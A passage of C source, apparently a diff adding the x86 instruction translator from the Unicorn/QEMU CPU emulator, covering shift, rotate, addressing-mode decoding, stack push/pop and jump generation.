*cpu_T[1]); + break; + case MO_16: + gen_helper_rclw(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; + case MO_32: + gen_helper_rcll(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; +#ifdef TARGET_X86_64 + case MO_64: + gen_helper_rclq(tcg_ctx, *cpu_T[0], tcg_ctx->cpu_env, *cpu_T[0], *cpu_T[1]); + break; +#endif + default: + tcg_abort(); + } + } + /* store */ + gen_op_st_rm_T0_A0(s, ot, op1); +} + +/* XXX: add faster immediate case */ +static void gen_shiftd_rm_T1(DisasContext *s, TCGMemOp ot, int op1, + bool is_right, TCGv count_in) +{ + target_ulong mask = (ot == MO_64 ? 63 : 31); + TCGv count; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv cpu_tmp4 = *(TCGv *)tcg_ctx->cpu_tmp4; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + /* load */ + if (op1 == OR_TMP0) { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], op1); + } + + count = tcg_temp_new(tcg_ctx); + tcg_gen_andi_tl(tcg_ctx, count, count_in, mask); + + switch (ot) { + case MO_16: + /* Note: we implement the Intel behaviour for shift count > 16. + This means "shrdw C, B, A" shifts A:B:A >> C. Build the B:A + portion by constructing it as a 32-bit value. */ + if (is_right) { + tcg_gen_deposit_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], *cpu_T[1], 16, 16); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], *cpu_T[0]); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[0], cpu_tmp0); + } else { + tcg_gen_deposit_tl(tcg_ctx, *cpu_T[1], *cpu_T[0], *cpu_T[1], 16, 16); + } + /* FALLTHRU */ +#ifdef TARGET_X86_64 + case MO_32: + /* Concatenate the two 32-bit values and use a 64-bit shift. */ + tcg_gen_subi_tl(tcg_ctx, cpu_tmp0, count, 1); + if (is_right) { + tcg_gen_concat_tl_i64(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + tcg_gen_shr_i64(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + tcg_gen_shr_i64(tcg_ctx, *cpu_T[0], *cpu_T[0], count); + } else { + tcg_gen_concat_tl_i64(tcg_ctx, *cpu_T[0], *cpu_T[1], *cpu_T[0]); + tcg_gen_shl_i64(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + tcg_gen_shl_i64(tcg_ctx, *cpu_T[0], *cpu_T[0], count); + tcg_gen_shri_i64(tcg_ctx, cpu_tmp0, cpu_tmp0, 32); + tcg_gen_shri_i64(tcg_ctx, *cpu_T[0], *cpu_T[0], 32); + } + break; +#endif + default: + tcg_gen_subi_tl(tcg_ctx, cpu_tmp0, count, 1); + if (is_right) { + tcg_gen_shr_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + + tcg_gen_subfi_tl(tcg_ctx, cpu_tmp4, mask + 1, count); + tcg_gen_shr_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], count); + tcg_gen_shl_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], cpu_tmp4); + } else { + tcg_gen_shl_tl(tcg_ctx, cpu_tmp0, *cpu_T[0], cpu_tmp0); + if (ot == MO_16) { + /* Only needed if count > 16, for Intel behaviour. */ + tcg_gen_subfi_tl(tcg_ctx, cpu_tmp4, 33, count); + tcg_gen_shr_tl(tcg_ctx, cpu_tmp4, *cpu_T[1], cpu_tmp4); + tcg_gen_or_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, cpu_tmp4); + } + + tcg_gen_subfi_tl(tcg_ctx, cpu_tmp4, mask + 1, count); + tcg_gen_shl_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], count); + tcg_gen_shr_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], cpu_tmp4); + } + tcg_gen_movi_tl(tcg_ctx, cpu_tmp4, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, *cpu_T[1], count, cpu_tmp4, + cpu_tmp4, *cpu_T[1]); + tcg_gen_or_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + break; + } + + /* store */ + gen_op_st_rm_T0_A0(s, ot, op1); + + gen_shift_flags(s, ot, *cpu_T[0], cpu_tmp0, count, is_right); + tcg_temp_free(tcg_ctx, count); +} + +static void gen_shift(DisasContext *s1, int op, TCGMemOp ot, int d, int s) +{ + TCGContext *tcg_ctx = s1->uc->tcg_ctx; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + if (s != OR_TMP1) + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], s); + switch(op) { + case OP_ROL: + gen_rot_rm_T1(s1, ot, d, 0); + break; + case OP_ROR: + gen_rot_rm_T1(s1, ot, d, 1); + break; + case OP_SHL: + case OP_SHL1: + gen_shift_rm_T1(s1, ot, d, 0, 0); + break; + case OP_SHR: + gen_shift_rm_T1(s1, ot, d, 1, 0); + break; + case OP_SAR: + gen_shift_rm_T1(s1, ot, d, 1, 1); + break; + case OP_RCL: + gen_rotc_rm_T1(s1, ot, d, 0); + break; + case OP_RCR: + gen_rotc_rm_T1(s1, ot, d, 1); + break; + } +} + +static void gen_shifti(DisasContext *s, int op, TCGMemOp ot, int d, int c) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + switch(op) { + case OP_ROL: + gen_rot_rm_im(s, ot, d, c, 0); + break; + case OP_ROR: + gen_rot_rm_im(s, ot, d, c, 1); + break; + case OP_SHL: + case OP_SHL1: + gen_shift_rm_im(s, ot, d, c, 0, 0); + break; + case OP_SHR: + gen_shift_rm_im(s, ot, d, c, 1, 0); + break; + case OP_SAR: + gen_shift_rm_im(s, ot, d, c, 1, 1); + break; + default: + /* currently not optimized */ + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], c); + gen_shift(s, op, ot, d, OR_TMP1); + break; + } +} + +static void gen_lea_modrm(CPUX86State *env, DisasContext *s, int modrm) +{ + target_long disp; + int havesib; + int base; + int index; + int scale; + int mod, rm, code, override, must_add_seg; + TCGv sum; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + override = s->override; + must_add_seg = s->addseg; + if (override >= 0) + must_add_seg = 1; + mod = (modrm >> 6) & 3; + rm = modrm & 7; + + switch (s->aflag) { + case MO_64: + case MO_32: + havesib = 0; + base = rm; + index = -1; + scale = 0; + + if (base == 4) { + havesib = 1; + code = cpu_ldub_code(env, s->pc++); + scale = (code >> 6) & 3; + index = ((code >> 3) & 7) | REX_X(s); + if (index == 4) { + index = -1; /* no index */ + } + base = (code & 7); + } + base |= REX_B(s); + + switch (mod) { + case 0: + if ((base & 7) == 5) { + base = -1; + disp = (int32_t)cpu_ldl_code(env, s->pc); + s->pc += 4; + if (CODE64(s) && !havesib) { + disp += s->pc + s->rip_offset; + } + } else { + disp = 0; + } + break; + case 1: + disp = (int8_t)cpu_ldub_code(env, s->pc++); + break; + default: + case 2: + disp = (int32_t)cpu_ldl_code(env, s->pc); + s->pc += 4; + break; + } + + /* For correct popl handling with esp. */ + if (base == R_ESP && s->popl_esp_hack) { + disp += s->popl_esp_hack; + } + + /* Compute the address, with a minimum number of TCG ops. */ + TCGV_UNUSED(sum); + if (index >= 0) { + if (scale == 0) { + sum = *cpu_regs[index]; + } else { + tcg_gen_shli_tl(tcg_ctx, cpu_A0, *cpu_regs[index], scale); + sum = cpu_A0; + } + if (base >= 0) { + tcg_gen_add_tl(tcg_ctx, cpu_A0, sum, *cpu_regs[base]); + sum = cpu_A0; + } + } else if (base >= 0) { + sum = *cpu_regs[base]; + } + if (TCGV_IS_UNUSED(sum)) { + tcg_gen_movi_tl(tcg_ctx, cpu_A0, disp); + } else { + tcg_gen_addi_tl(tcg_ctx, cpu_A0, sum, disp); + } + + if (must_add_seg) { + if (override < 0) { + if (base == R_EBP || base == R_ESP) { + override = R_SS; + } else { + override = R_DS; + } + } + + tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUX86State, segs[override].base)); + if (CODE64(s)) { + if (s->aflag == MO_32) { + tcg_gen_ext32u_tl(tcg_ctx, cpu_A0, cpu_A0); + } + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, cpu_tmp0); + return; + } + + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, cpu_tmp0); + } + + if (s->aflag == MO_32) { + tcg_gen_ext32u_tl(tcg_ctx, cpu_A0, cpu_A0); + } + break; + + case MO_16: + switch (mod) { + case 0: + if (rm == 6) { + disp = cpu_lduw_code(env, s->pc); + s->pc += 2; + tcg_gen_movi_tl(tcg_ctx, cpu_A0, disp); + rm = 0; /* avoid SS override */ + goto no_rm; + } else { + disp = 0; + } + break; + case 1: + disp = (int8_t)cpu_ldub_code(env, s->pc++); + break; + default: + case 2: + disp = (int16_t)cpu_lduw_code(env, s->pc); + s->pc += 2; + break; + } + + sum = cpu_A0; + switch (rm) { + case 0: + tcg_gen_add_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EBX], *cpu_regs[R_ESI]); + break; + case 1: + tcg_gen_add_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EBX], *cpu_regs[R_EDI]); + break; + case 2: + tcg_gen_add_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EBP], *cpu_regs[R_ESI]); + break; + case 3: + tcg_gen_add_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EBP], *cpu_regs[R_EDI]); + break; + case 4: + sum = *cpu_regs[R_ESI]; + break; + case 5: + sum = *cpu_regs[R_EDI]; + break; + case 6: + sum = *cpu_regs[R_EBP]; + break; + default: + case 7: + sum = *cpu_regs[R_EBX]; + break; + } + tcg_gen_addi_tl(tcg_ctx, cpu_A0, sum, disp); + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, cpu_A0); + no_rm: + if (must_add_seg) { + if (override < 0) { + if (rm == 2 || rm == 3 || rm == 6) { + override = R_SS; + } else { + override = R_DS; + } + } + gen_op_addl_A0_seg(s, override); + } + break; + + default: + tcg_abort(); + } +} + +static void gen_nop_modrm(CPUX86State *env, DisasContext *s, int modrm) +{ + int mod, rm, base, code; + + mod = (modrm >> 6) & 3; + if (mod == 3) + return; + rm = modrm & 7; + + switch (s->aflag) { + case MO_64: + case MO_32: + base = rm; + + if (base == 4) { + code = cpu_ldub_code(env, s->pc++); + base = (code & 7); + } + + switch (mod) { + case 0: + if (base == 5) { + s->pc += 4; + } + break; + case 1: + s->pc++; + break; + default: + case 2: + s->pc += 4; + break; + } + break; + + case MO_16: + switch (mod) { + case 0: + if (rm == 6) { + s->pc += 2; + } + break; + case 1: + s->pc++; + break; + default: + case 2: + s->pc += 2; + break; + } + break; + + default: + tcg_abort(); + } +} + +/* used for LEA and MOV AX, mem */ +static void gen_add_A0_ds_seg(DisasContext *s) +{ + int override, must_add_seg; + must_add_seg = s->addseg; + override = R_DS; + if (s->override >= 0) { + override = s->override; + must_add_seg = 1; + } + if (must_add_seg) { +#ifdef TARGET_X86_64 + if (CODE64(s)) { + gen_op_addq_A0_seg(s->uc->tcg_ctx, override); + } else +#endif + { + gen_op_addl_A0_seg(s, override); + } + } +} + +/* generate modrm memory load or store of 'reg'. TMP0 is used if reg == + OR_TMP0 */ +static void gen_ldst_modrm(CPUX86State *env, DisasContext *s, int modrm, + TCGMemOp ot, int reg, int is_store) +{ + int mod, rm; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + if (mod == 3) { + if (is_store) { + if (reg != OR_TMP0) + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + if (reg != OR_TMP0) + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + } + } else { + gen_lea_modrm(env, s, modrm); + if (is_store) { + if (reg != OR_TMP0) + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + if (reg != OR_TMP0) + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + } + } +} + +static inline uint32_t insn_get(CPUX86State *env, DisasContext *s, TCGMemOp ot) +{ + uint32_t ret; + + switch (ot) { + case MO_8: + ret = cpu_ldub_code(env, s->pc); + s->pc++; + break; + case MO_16: + ret = cpu_lduw_code(env, s->pc); + s->pc += 2; + break; + case MO_32: +#ifdef TARGET_X86_64 + case MO_64: +#endif + ret = cpu_ldl_code(env, s->pc); + s->pc += 4; + break; + default: + tcg_abort(); + } + return ret; +} + +static inline int insn_const_size(TCGMemOp ot) +{ + if (ot <= MO_32) { + return 1 << ot; + } else { + return 4; + } +} + +static inline void gen_goto_tb(DisasContext *s, int tb_num, target_ulong eip) +{ + TranslationBlock *tb; + target_ulong pc; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + pc = s->cs_base + eip; + tb = s->tb; + /* NOTE: we handle the case where the TB spans two pages here */ + if ((pc & TARGET_PAGE_MASK) == (tb->pc & TARGET_PAGE_MASK) || + (pc & TARGET_PAGE_MASK) == ((s->pc - 1) & TARGET_PAGE_MASK)) { + /* jump to same page: we can use a direct jump */ + tcg_gen_goto_tb(tcg_ctx, tb_num); + gen_jmp_im(s, eip); + tcg_gen_exit_tb(tcg_ctx, (uintptr_t)tb + tb_num); + } else { + /* jump to another page: currently not optimized */ + gen_jmp_im(s, eip); + gen_eob(s); + } +} + +static inline void gen_jcc(DisasContext *s, int b, + target_ulong val, target_ulong next_eip) +{ + int l1, l2; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + if (s->jmp_opt) { + l1 = gen_new_label(tcg_ctx); + gen_jcc1(s, b, l1); + + gen_goto_tb(s, 0, next_eip); + + gen_set_label(tcg_ctx, l1); + gen_goto_tb(s, 1, val); + s->is_jmp = DISAS_TB_JUMP; + } else { + l1 = gen_new_label(tcg_ctx); + l2 = gen_new_label(tcg_ctx); + gen_jcc1(s, b, l1); + + gen_jmp_im(s, next_eip); + tcg_gen_br(tcg_ctx, l2); + + gen_set_label(tcg_ctx, l1); + gen_jmp_im(s, val); + gen_set_label(tcg_ctx, l2); + gen_eob(s); + } +} + +static void gen_cmovcc1(CPUX86State *env, DisasContext *s, TCGMemOp ot, int b, + int modrm, int reg) +{ + CCPrepare cc; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + + cc = gen_prepare_cc(s, b, *cpu_T[1]); + if (cc.mask != -1) { + TCGv t0 = tcg_temp_new(tcg_ctx); + tcg_gen_andi_tl(tcg_ctx, t0, cc.reg, cc.mask); + cc.reg = t0; + } + if (!cc.use_reg2) { + cc.reg2 = tcg_const_tl(tcg_ctx, cc.imm); + } + + tcg_gen_movcond_tl(tcg_ctx, cc.cond, *cpu_T[0], cc.reg, cc.reg2, + *cpu_T[0], *cpu_regs[reg]); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + + if (cc.mask != -1) { + tcg_temp_free(tcg_ctx, cc.reg); + } + if (!cc.use_reg2) { + tcg_temp_free(tcg_ctx, cc.reg2); + } +} + +static inline void gen_op_movl_T0_seg(TCGContext *s, int seg_reg) +{ + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_ld32u_tl(s, *cpu_T[0], s->cpu_env, + offsetof(CPUX86State,segs[seg_reg].selector)); +} + +static inline void gen_op_movl_seg_T0_vm(TCGContext *s, int seg_reg) +{ + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_andi_tl(s, *cpu_T[0], *cpu_T[0], 0xffff); + tcg_gen_st32_tl(s, *cpu_T[0], s->cpu_env, + offsetof(CPUX86State,segs[seg_reg].selector)); + tcg_gen_shli_tl(s, *cpu_T[0], *cpu_T[0], 4); + tcg_gen_st_tl(s, *cpu_T[0], s->cpu_env, + offsetof(CPUX86State,segs[seg_reg].base)); +} + +/* move T0 to seg_reg and compute if the CPU state may change. Never + call this function with seg_reg == R_CS */ +static void gen_movl_seg_T0(DisasContext *s, int seg_reg, target_ulong cur_eip) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + if (s->pe && !s->vm86) { + /* XXX: optimize by finding processor state dynamically */ + gen_update_cc_op(s); + gen_jmp_im(s, cur_eip); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_load_seg(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, seg_reg), cpu_tmp2_i32); + /* abort translation because the addseg value may change or + because ss32 may change. For R_SS, translation must always + stop as a special handling must be done to disable hardware + interrupts for the next instruction */ + if (seg_reg == R_SS || (s->code32 && seg_reg < R_FS)) + s->is_jmp = DISAS_TB_JUMP; + } else { + gen_op_movl_seg_T0_vm(tcg_ctx, seg_reg); + if (seg_reg == R_SS) + s->is_jmp = DISAS_TB_JUMP; + } +} + +static inline int svm_is_rep(int prefixes) +{ + return ((prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) ? 8 : 0); +} + +static inline void +gen_svm_check_intercept_param(DisasContext *s, target_ulong pc_start, + uint32_t type, uint64_t param) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + /* no SVM activated; fast case */ + if (likely(!(s->flags & HF_SVMI_MASK))) + return; + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_svm_check_intercept_param(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, type), + tcg_const_i64(tcg_ctx, param)); +} + +static inline void +gen_svm_check_intercept(DisasContext *s, target_ulong pc_start, uint64_t type) +{ + gen_svm_check_intercept_param(s, pc_start, type, 0); +} + +static inline void gen_stack_update(DisasContext *s, int addend) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + +#ifdef TARGET_X86_64 + if (CODE64(s)) { + gen_op_add_reg_im(tcg_ctx, MO_64, R_ESP, addend); + } else +#endif + if (s->ss32) { + gen_op_add_reg_im(tcg_ctx, MO_32, R_ESP, addend); + } else { + gen_op_add_reg_im(tcg_ctx, MO_16, R_ESP, addend); + } +} + +/* Generate a push. It depends on ss32, addseg and dflag. */ +static void gen_push_v(DisasContext *s, TCGv val) +{ + TCGMemOp a_ot, d_ot = mo_pushpop(s, s->dflag); + int size = 1 << d_ot; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp4 = *(TCGv *)tcg_ctx->cpu_tmp4; + TCGv new_esp = cpu_A0; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + tcg_gen_subi_tl(tcg_ctx, cpu_A0, *cpu_regs[R_ESP], size); + + if (CODE64(s)) { + a_ot = MO_64; + } else if (s->ss32) { + a_ot = MO_32; + if (s->addseg) { + new_esp = cpu_tmp4; + tcg_gen_mov_tl(tcg_ctx, new_esp, cpu_A0); + gen_op_addl_A0_seg(s, R_SS); + } else { + tcg_gen_ext32u_tl(tcg_ctx, cpu_A0, cpu_A0); + } + } else { + a_ot = MO_16; + new_esp = cpu_tmp4; + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, cpu_A0); + tcg_gen_mov_tl(tcg_ctx, new_esp, cpu_A0); + gen_op_addl_A0_seg(s, R_SS); + } + + gen_op_st_v(s, d_ot, val, cpu_A0); + gen_op_mov_reg_v(tcg_ctx, a_ot, R_ESP, new_esp); +} + +/* two step pop is necessary for precise exceptions */ +static TCGMemOp gen_pop_T0(DisasContext *s) +{ + TCGMemOp d_ot = mo_pushpop(s, s->dflag); + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv addr = cpu_A0; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + if (CODE64(s)) { + addr = *cpu_regs[R_ESP]; + } else if (!s->ss32) { + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, *cpu_regs[R_ESP]); + gen_op_addl_A0_seg(s, R_SS); + } else if (s->addseg) { + tcg_gen_mov_tl(tcg_ctx, cpu_A0, *cpu_regs[R_ESP]); + gen_op_addl_A0_seg(s, R_SS); + } else { + tcg_gen_ext32u_tl(tcg_ctx, cpu_A0, *cpu_regs[R_ESP]); + } + + gen_op_ld_v(s, d_ot, *cpu_T[0], addr); + return d_ot; +} + +static void gen_pop_update(DisasContext *s, TCGMemOp ot) +{ + gen_stack_update(s, 1 << ot); +} + +static void gen_stack_A0(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_op_movl_A0_reg(tcg_ctx, R_ESP); + if (!s->ss32) + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, cpu_A0); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], cpu_A0); + if (s->addseg) + gen_op_addl_A0_seg(s, R_SS); +} + +/* NOTE: wrap around in 16 bit not fully handled */ +static void gen_pusha(DisasContext *s) +{ + int i; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_op_movl_A0_reg(tcg_ctx, R_ESP); + gen_op_addl_A0_im(tcg_ctx, ((unsigned int)(-8)) << s->dflag); + if (!s->ss32) + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, cpu_A0); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], cpu_A0); + if (s->addseg) + gen_op_addl_A0_seg(s, R_SS); + for(i = 0;i < 8; i++) { + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], 7 - i); + gen_op_st_v(s, s->dflag, *cpu_T[0], cpu_A0); + gen_op_addl_A0_im(tcg_ctx, 1 << s->dflag); + } + gen_op_mov_reg_v(tcg_ctx, MO_16 + s->ss32, R_ESP, *cpu_T[1]); +} + +/* NOTE: wrap around in 16 bit not fully handled */ +static void gen_popa(DisasContext *s) +{ + int i; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_op_movl_A0_reg(tcg_ctx, R_ESP); + if (!s->ss32) + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, cpu_A0); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], cpu_A0); + tcg_gen_addi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], 8 << s->dflag); + if (s->addseg) + gen_op_addl_A0_seg(s, R_SS); + for(i = 0;i < 8; i++) { + /* ESP is not reloaded */ + if (i != 3) { + gen_op_ld_v(s, s->dflag, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, s->dflag, 7 - i, *cpu_T[0]); + } + gen_op_addl_A0_im(tcg_ctx, 1 << s->dflag); + } + gen_op_mov_reg_v(tcg_ctx, MO_16 + s->ss32, R_ESP, *cpu_T[1]); +} + +static void gen_enter(DisasContext *s, int esp_addend, int level) +{ + TCGMemOp ot = mo_pushpop(s, s->dflag); + int opsize = 1 << ot; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + level &= 0x1f; +#ifdef TARGET_X86_64 + if (CODE64(s)) { + gen_op_movl_A0_reg(tcg_ctx, R_ESP); + gen_op_addq_A0_im(tcg_ctx, -opsize); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], cpu_A0); + + /* push bp */ + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], R_EBP); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + if (level) { + /* XXX: must save state */ + gen_helper_enter64_level(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, level), + tcg_const_i32(tcg_ctx, (ot == MO_64)), + *cpu_T[1]); + } + gen_op_mov_reg_v(tcg_ctx, ot, R_EBP, *cpu_T[1]); + tcg_gen_addi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], -esp_addend + (-opsize * level)); + gen_op_mov_reg_v(tcg_ctx, MO_64, R_ESP, *cpu_T[1]); + } else +#endif + { + gen_op_movl_A0_reg(tcg_ctx, R_ESP); + gen_op_addl_A0_im(tcg_ctx, -opsize); + if (!s->ss32) + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, cpu_A0); + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], cpu_A0); + if (s->addseg) + gen_op_addl_A0_seg(s, R_SS); + /* push bp */ + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], R_EBP); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + if (level) { + /* XXX: must save state */ + gen_helper_enter_level(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, level), + tcg_const_i32(tcg_ctx, s->dflag - 1), + *cpu_T[1]); + } + gen_op_mov_reg_v(tcg_ctx, ot, R_EBP, *cpu_T[1]); + tcg_gen_addi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], -esp_addend + (-opsize * level)); + gen_op_mov_reg_v(tcg_ctx, MO_16 + s->ss32, R_ESP, *cpu_T[1]); + } +} + +static void gen_exception(DisasContext *s, int trapno, target_ulong cur_eip) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + gen_update_cc_op(s); + gen_jmp_im(s, cur_eip); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, trapno)); + s->is_jmp = DISAS_TB_JUMP; +} + +/* an interrupt is different from an exception because of the + privilege checks */ +static void gen_interrupt(DisasContext *s, int intno, + target_ulong cur_eip, target_ulong next_eip) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + gen_update_cc_op(s); + // Unicorn: skip to the next instruction after our interrupt callback + gen_jmp_im(s, cur_eip); + gen_helper_raise_interrupt(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, intno), + tcg_const_i32(tcg_ctx, next_eip - cur_eip)); + s->is_jmp = DISAS_TB_JUMP; +} + +static void gen_debug(DisasContext *s, target_ulong cur_eip) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + gen_update_cc_op(s); + gen_jmp_im(s, cur_eip); + gen_helper_debug(tcg_ctx, tcg_ctx->cpu_env); + s->is_jmp = DISAS_TB_JUMP; +} + +/* generate a generic end of block. Trace exception is also generated + if needed */ +static void gen_eob(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + gen_update_cc_op(s); // qq + if (s->tb->flags & HF_INHIBIT_IRQ_MASK) { + gen_helper_reset_inhibit_irq(tcg_ctx, tcg_ctx->cpu_env); + } + if (s->tb->flags & HF_RF_MASK) { + gen_helper_reset_rf(tcg_ctx, tcg_ctx->cpu_env); + } + if (s->singlestep_enabled) { + gen_helper_debug(tcg_ctx, tcg_ctx->cpu_env); + } else if (s->tf) { + gen_helper_single_step(tcg_ctx, tcg_ctx->cpu_env); + } else { + tcg_gen_exit_tb(s->uc->tcg_ctx, 0); + } + s->is_jmp = DISAS_TB_JUMP; +} + +/* generate a jump to eip. No segment change must happen before as a + direct call to the next block may occur */ +static void gen_jmp_tb(DisasContext *s, target_ulong eip, int tb_num) +{ + gen_update_cc_op(s); + set_cc_op(s, CC_OP_DYNAMIC); + if (s->jmp_opt) { + gen_goto_tb(s, tb_num, eip); + s->is_jmp = DISAS_TB_JUMP; + } else { + gen_jmp_im(s, eip); + gen_eob(s); + } +} + +static void gen_jmp(DisasContext *s, target_ulong eip) +{ + gen_jmp_tb(s, eip, 0); +} + +static inline void gen_ldq_env_A0(DisasContext *s, int offset) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 cpu_tmp1_i64 = tcg_ctx->cpu_tmp1_i64; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + + tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_A0, s->mem_index, MO_LEQ); + tcg_gen_st_i64(tcg_ctx, cpu_tmp1_i64, tcg_ctx->cpu_env, offset); 